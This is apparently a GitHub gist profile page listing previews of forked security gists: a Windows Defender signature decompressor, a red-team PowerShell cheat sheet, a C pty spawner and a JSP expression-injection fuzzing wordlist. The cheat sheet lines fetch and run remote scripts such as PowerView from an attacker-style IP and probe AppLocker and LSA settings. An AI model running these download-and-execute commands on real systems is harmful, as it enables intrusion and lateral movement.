ImaginaryBIT
ImaginaryBIT
/ ExpandDefenderSig.ps1
Created
April 15, 2019 10:03
— forked from mattifestation/ExpandDefenderSig.ps1
Decompresses Windows Defender AV signatures for exploration purposes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| filter Expand-DefenderAVSignatureDB { | |
| <# | |
| .SYNOPSIS | |
| Decompresses a Windows Defender AV signature database (.VDM file). | |
| .DESCRIPTION | |
| Expand-DefenderAVSignatureDB extracts a Windows Defender AV signature database (.VDM file). This function was developed by reversing mpengine.dll and with the help of Tavis Ormandy and his LoadLibrary project (https://github.com/taviso/loadlibrary). Note: Currently, "scrambled" databases are not supported although, I have yet to encounter a scrambled database. Thus far, all databases I've encountered are zlib-compressed. |
ImaginaryBIT
/ RedTeam_CheatSheet.ps1
Last active
October 31, 2023 22:44
— forked from m8sec/RedTeam_CheatSheet.ps1
#05. RedTeam CheatSheet
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # General Payload | |
| ```powershell | |
| $ExecutionContext.SessionState.LanguageMode | |
| Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe | |
| dir C:\Windows\Microsoft.Net\Framework64 | |
| Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "RunAsPPL" | |
| IEX(New-Object Net.WebClient).DownloadString("http://192.168.49.54:8080/apple.txt"); | |
| IEX(New-Object Net.WebClient).DownloadString("http://192.168.49.54:8080/loadDLL64.txt"); | |
| IEX(New-Object Net.WebClient).DownloadString("http://192.168.49.54:8080/PowerView.ps1"); |
ImaginaryBIT
/ pty_spawn.c
Created
February 25, 2022 10:07
— forked from bomsi/pty_spawn.c
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define _XOPEN_SOURCE 600 | |
| #define _BSD_SOURCE | |
| #include <unistd.h> | |
| #include <termios.h> | |
| #include <sys/types.h> | |
| #include <sys/ioctl.h> | |
| #include <sys/select.h> | |
| #include <stdlib.h> | |
| #include <stdio.h> |
ImaginaryBIT
/ jsp-jstl-intruders.txt
Created
April 24, 2023 02:06
— forked from arbazkiraak/jsp-jstl-intruders.txt
wordlist generated Based on : https://medium.com/@adrien_jeanneau/how-i-was-able-to-list-some-internal-information-from-paypal-bugbounty-ca8d217a397c
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ${0 } | |
| ${0 == pageList.maxPage} | |
| ${1} | |
| ${1 eq currentPageNumber } | |
| ${5} | |
| ${5/6} | |
| ${a+1 } | |
| ${a.academyName} | |
| ${a.academyNumber} | |
| ${academyNumber==a.academyNumber} |